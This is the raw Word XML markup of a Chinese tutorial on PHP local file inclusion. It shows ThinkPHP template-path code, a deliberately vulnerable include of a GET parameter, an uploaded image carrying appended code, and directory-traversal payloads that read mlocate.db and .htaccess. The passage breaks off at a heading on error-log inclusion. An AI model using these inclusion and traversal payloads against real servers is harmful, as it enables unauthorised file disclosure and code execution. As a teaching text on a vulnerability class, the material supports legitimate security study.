                    <w:spacing w:before="73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>(strpos($templateFile,'@')){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45"/>
                    <w:ind w:left="1080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引入其它主题的操作模板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必须带上模块名称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例如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blue@User:add</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2335"/>
                    </w:tabs>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="58" w:firstLine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$templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>TMPL_PATH.str_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>array(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">'@',':'),'/',$templateFile).C('TMPL_TEMPLATE_S </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>UFFIX');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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>(strpos($templateFile,':')){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45"/>
                    <w:ind w:left="1080"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                      <w:lang w:eastAsia="zh-CN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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>引入其它模块的操作模板</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2335"/>
                    </w:tabs>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="108" w:firstLine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$templateFile</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t xml:space="preserve">= </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>TEMPLATE_PATH.'/'.str_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-1"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">':','/',$templateFile).C('TMPL_TEMPLATE_SUF </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>FIX');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3564"/>
                    </w:tabs>
                    <w:spacing w:before="2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>(!is_file($templateFile))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="1080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sz w:val="18"/>
                    </w:rPr>
                    <w:t>引入当前模块的其它操作模板</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:w w:val="99"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18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Vrinda"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9849" type="#_x0000_t202" style="width:319.25pt;height:146.7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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="-11" w:firstLine="108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$templateFile = dirname(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'TMPL_FILE_NAME')).'/'.$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templateFile.C(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'TMPL_TEMPLATE_SUFFIX ');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left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ind w:left="72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!file_exists_case($templateFile))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="146" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="938" w:hanging="72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throw_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exception(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L('_TEMPLATE_NOT_EXIST_').'['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templateFile.']'); return $templateFile;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="36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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有了包含点，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要一个含有我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们恶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>意代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的文件，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>thinphp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="48" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="4783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的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>功能：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制造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/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10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3744457" cy="1603248"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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457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a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3520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115621</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4043108" cy="2178939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3108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6"/>
        <w:spacing w:before="137" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> wooyun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="297" w:firstLine="420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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件包含漏洞的产生原因是在通过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的函数引入文件时，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由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，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就可能导致意外的文件泄露甚至恶意的代码注入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>最常见的就属于本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地文件包含（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Local File Inclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>）漏洞了。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我们来看下面一段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9848" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:20.1pt;width:319.25pt;height:36.05pt;z-index:3544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b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b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>( $_GET [ 'func' ]) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>$_GET [ 'func' ];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847" type="#_x0000_t202" style="width:319.25pt;height:5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 xml:space="preserve">} </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">else </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑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b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:b/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>'default.php' ;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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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程序的本意可能是当提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://example.com/index.php?func=add.php</w:t>
        </w:r>
      </w:hyperlink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时，调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> add.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>里面的样式内容和功能。直接访问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hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://example.com/in</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>dex.php</w:t>
        </w:r>
      </w:hyperlink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则会包含默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> default.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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那么问题来了，如果我们提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://example.com/index.php?func=upload/pic/evil.jpg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，且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evil.jpg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是由黑客上传到服务器上的一个图片，在图片的末尾添加了恶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意的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代码，那么恶意的代码就会被引入当前文件执行。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9"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right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如果被包含的文件中无有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-3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代码，则会直接把文件内容输出。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在接下来的内容中会以代码样本作为例子，来给大家介绍各种奇葩</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>猥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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琐</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的利用姿势</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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普通本地文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9846" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:20.05pt;width:319.25pt;height:36pt;z-index:3592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include(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"inc/".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GET[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'file']); ?&gt;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spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="32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包含同目录下的文件：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/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9845" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:38.2pt;width:319.25pt;height:36pt;z-index:3616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?file=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..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/../../../../../../../../var/lib/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locate.db</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:spacing w:val="-41"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>?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file=../../../../../../../../../v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ar/lib/mlocate/mlocate.db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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=.htaccess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目录遍历：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="304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（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中这两个文件储存着所有文件的路径，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>权限）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"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包含错误日志：</w:t>
      </w:r>
    </w:p>
